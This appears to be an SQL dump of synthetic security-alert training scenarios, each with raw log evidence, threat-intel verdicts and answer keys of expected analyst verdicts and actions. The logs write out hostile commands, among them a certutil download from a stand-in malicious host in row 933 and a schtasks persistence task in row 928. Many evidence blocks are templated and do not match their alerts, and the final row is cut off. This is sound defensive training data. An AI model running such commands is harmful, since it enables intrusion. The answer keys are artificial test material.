(928, 'Persistence: Establishing Foothold', 'high', 'System logs', 'An unusual persistence mechanism was detected on a critical server. Analysis of the system logs revealed suspicious activity associated with maintaining unauthorized access. A known malicious IP communicated with an internal server, and a suspicious script was set to execute on startup, indicating efforts to establish a foothold.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:22Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"user\":\"malicious_user\",\"process\":\"schtasks.exe\",\"command_line\":\"schtasks /create /tn \\\"SystemUpdate\\\" /tr \\\"C:\\\\Windows\\\\System32\\\\malicious_script.ps1\\\" /sc onlogon\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious_script.ps1\"}', '2026-01-15 01:04:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File used in known persistence techniques\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User account associated with unauthorized access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.614Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:22Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process\\\":\\\"schtasks.exe\\\",\\\"command_line\\\":\\\"schtasks /create /tn \\\\\\\"SystemUpdate\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_script.ps1\\\\\\\" /sc onlogon\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_script.ps1\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.614Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:22Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process\\\":\\\"schtasks.exe\\\",\\\"command_line\\\":\\\"schtasks /create /tn \\\\\\\"SystemUpdate\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_script.ps1\\\\\\\" /sc onlogon\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_script.ps1\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.614Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:22Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process\\\":\\\"schtasks.exe\\\",\\\"command_line\\\":\\\"schtasks /create /tn \\\\\\\"SystemUpdate\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_script.ps1\\\\\\\" /sc onlogon\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_script.ps1\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.614Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:22Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process\\\":\\\"schtasks.exe\\\",\\\"command_line\\\":\\\"schtasks /create /tn \\\\\\\"SystemUpdate\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_script.ps1\\\\\\\" /sc onlogon\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_script.ps1\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.614Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:22Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process\\\":\\\"schtasks.exe\\\",\\\"command_line\\\":\\\"schtasks /create /tn \\\\\\\"SystemUpdate\\\\\\\" /tr \\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious_script.ps1\\\\\\\" /sc onlogon\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_script.ps1\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(929, 'Lateral Movement: Spreading the Ransomware', 'critical', 'Network traffic analysis', 'The attackers have successfully moved laterally within the network, deploying ransomware to multiple systems. This step involves using compromised credentials to access network shares and execute malicious payloads, exponentially increasing the impact and demanding higher ransom.', 'Lateral Movement', 'T1076: Remote Desktop Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T03:45:23Z\",\"source_ip\":\"192.168.1.12\",\"destination_ip\":\"10.0.0.45\",\"attacker_ip\":\"203.0.113.57\",\"username\":\"john.doe\",\"filename\":\"ransomware_payload.exe\",\"hash\":\"cf23df2207d99a74fbe169e3eba035e633b65d94\",\"protocol\":\"RDP\",\"action\":\"executed\",\"status\":\"success\"}', '2026-01-15 01:04:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Target system of lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used by attacker.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"cf23df2207d99a74fbe169e3eba035e633b65d94\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus total\",\"verdict\":\"malicious\",\"details\":\"Hash identified as associated with ransomware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"malicious\",\"details\":\"File used to execute ransomware.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"suspicious\",\"details\":\"Compromised user account used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(930, 'Exfiltration: Data Harvesting', 'critical', 'Data loss prevention (DLP) systems', 'In a bid to strengthen their negotiating position, SamSam exfiltrated data, adding a layer of data breach to the incident. Sensitive files were transferred from the internal network to an external IP address associated with known malicious activity.', 'Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:22:07Z\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"file_name\":\"financial_report_q3_2023.xlsx\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"action\":\"exfiltration\",\"status\":\"success\"}', '2026-01-15 01:04:52', '2026-02-16 17:54:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous ransomware attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_documents\",\"verdict\":\"sensitive\",\"details\":\"Contains sensitive financial data\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"suspicious\",\"details\":\"Hash of exfiltrated file\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"internal\",\"details\":\"Username of compromised account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.616Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.616Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.616Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.616Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.616Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:07Z\\\",\\\"source_ip\\\":\\\"10.0.5.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(931, 'Ransom Demand: Communication Interception', 'critical', 'Email server logs', 'In the final phase of the attack, the threat actors delivered a ransom note to the victim\'s email, demanding $51,000 in Bitcoin. The attackers used compromised email accounts to send the note and negotiate payment terms, while the actual recovery costs spiraled beyond the ransom demand.', 'Command and Control', 'T1059 - Command and Scripting Interpreter', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:52:36Z\",\"source_ip\":\"203.0.113.54\",\"destination_ip\":\"10.0.0.5\",\"source_email\":\"compromised@victimdomain.com\",\"destination_email\":\"finance@victimdomain.com\",\"email_subject\":\"Urgent: Payment Required\",\"email_body\":\"Your systems have been encrypted. Send $51,000 in Bitcoin to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa. Failure to comply will result in data loss.\",\"attachment_name\":\"Ransom_Note.txt\",\"attachment_hash\":\"eb5e0e0c2e9c2f7b410f51f4b8c8f5e1\",\"compromised_user\":\"j.doe@victimdomain.com\"}', '2026-01-15 01:04:52', '2026-02-16 17:54:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with ransomware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP where the ransom note was delivered.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"compromised@victimdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Investigation\",\"verdict\":\"malicious\",\"details\":\"Employee email account used by attackers to send ransom note.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"eb5e0e0c2e9c2f7b410f51f4b8c8f5e1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash of the ransomware note attachment.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Ransom Demand: Communication Interception\",\"date\":\"2026-02-01T20:32:22.618Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(932, 'Phishing Attempt Detected from Spoofed Domain', 'high', 'Proofpoint', 'A phishing email was received from a spoofed domain with a malicious link embedded. The email purports to be from a trusted source, tricking users into clicking the link.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-16T08:23:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"hostname\":\"jdoe-laptop\",\"email_sender\":\"no-reply@secure-update.com\",\"url\":\"http://malicious-link.com/login\"}', '2026-01-16 13:02:59', '2026-03-11 03:14:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@secure-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Phishing domain known for credential harvesting\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 50 times for phishing attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email and URL are verified malicious through OSINT, confirming a phishing attempt.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt Detected from Spoofed Domain\",\"date\":\"2026-02-01T20:32:22.618Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(933, 'Suspicious Command Line Execution Detected', 'medium', 'Proofpoint', 'A potentially malicious command was executed on a user\'s machine, indicating a possible attempt to gain persistence or execute further attacks.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-01-16T11:12:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"192.168.2.50\",\"username\":\"mjohnson\",\"hostname\":\"workstation-05\",\"command_line\":\"cmd.exe /c echo %TEMP% & certutil -urlcache -f http://suspicious-site.com/file.exe C:\\\\Users\\\\mjohnson\\\\file.exe\"}', '2026-01-16 13:02:59', '2026-03-11 03:06:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"cmd.exe /c echo %TEMP% & certutil -urlcache -f http://suspicious-site.com/file.exe C:\\\\Users\\\\mjohnson\\\\file.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicates possible malware download attempt\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://suspicious-site.com/file.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with malware distribution\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal source IP address\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command execution is part of a known malware pattern, downloading and executing malicious payloads.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Command Line Execution Detected\",\"date\":\"2026-02-01T20:32:22.619Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(934, 'Brute Force Login Attempts Detected', 'high', 'Proofpoint', 'Multiple failed login attempts detected against an internal server, indicating a possible brute force attack.', 'Credential Attack', 'T1110', 1, 'Closed', 177, '{\"timestamp\":\"2026-01-16T03:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.89\",\"dst_ip\":\"192.168.10.10\",\"username\":\"administrator\",\"hostname\":\"server01\",\"failed_attempts\":25}', '2026-01-16 13:02:59', '2026-02-22 08:59:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 200 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username in brute force attacks\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.10.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server IP address\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from a known malicious IP confirms a brute force attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Brute Force Login Attempts Detected\",\"date\":\"2026-02-01T20:32:22.620Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(935, 'Malware Download Attempt via Suspicious Domain', 'critical', 'Proofpoint', 'A file download from a known malicious domain was detected, indicating a high likelihood of malware infection.', 'Malware', 'T1129', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T07:30:55Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.50.3\",\"dst_ip\":\"185.199.108.153\",\"username\":\"kwhite\",\"hostname\":\"kwhite-pc\",\"url\":\"http://known-malicious.com/download.exe\",\"file_hash\":\"3d2e7f3b5b2e8c8e6c2f1a5d0e8c9b9a\"}', '2026-01-16 13:02:59', '2026-02-16 17:53:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://known-malicious.com/download.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"file_hash\",\"value\":\"3d2e7f3b5b2e8c8e6c2f1a5d0e8c9b9a\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP used for malware hosting\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.50.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal client machine\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash and URL are confirmed malicious, indicating an active threat.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Malware Download Attempt via Suspicious Domain\",\"date\":\"2026-02-01T20:32:22.621Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(936, 'Suspicious Network Connection Detected', 'medium', 'Proofpoint', 'An unusual network connection was established from an internal host to an external IP known for suspicious activity.', 'Data Exfiltration', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-01-16T14:22:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.30.10\",\"dst_ip\":\"45.67.89.101\",\"username\":\"hparker\",\"hostname\":\"hparker-device\",\"domain\":\"suspicious-domain.net\"}', '2026-01-16 13:02:59', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.67.89.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"suspicious-domain.net\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Domain flagged for potential data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.30.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host IP address\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP and domain are flagged as suspicious, suggesting potential data exfiltration.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT', NULL, NULL, 